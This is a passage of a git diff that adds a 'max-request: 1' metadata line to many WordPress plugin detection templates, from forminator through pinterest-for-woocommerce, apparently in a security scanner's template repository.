   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml
index 980265f531..91c89d0ad8 100644
--- a/http/technologies/wordpress/plugins/forminator.yaml
+++ b/http/technologies/wordpress/plugins/forminator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/forminator/
   metadata:
+    max-request: 1
     plugin_namespace: forminator
     wpscan: https://wpscan.com/plugin/forminator
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
index daf205789d..539d9f7cec 100644
--- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml
+++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ga-google-analytics/
   metadata:
+    max-request: 1
     plugin_namespace: ga-google-analytics
     wpscan: https://wpscan.com/plugin/ga-google-analytics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
index 22bfa3ffe2..f4123bb594 100644
--- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
+++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gdpr-cookie-compliance/
   metadata:
+    max-request: 1
     plugin_namespace: gdpr-cookie-compliance
     wpscan: https://wpscan.com/plugin/gdpr-cookie-compliance
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
index 7ed171d662..254f916291 100644
--- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 1778552d75..9c6e3e6d2e 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
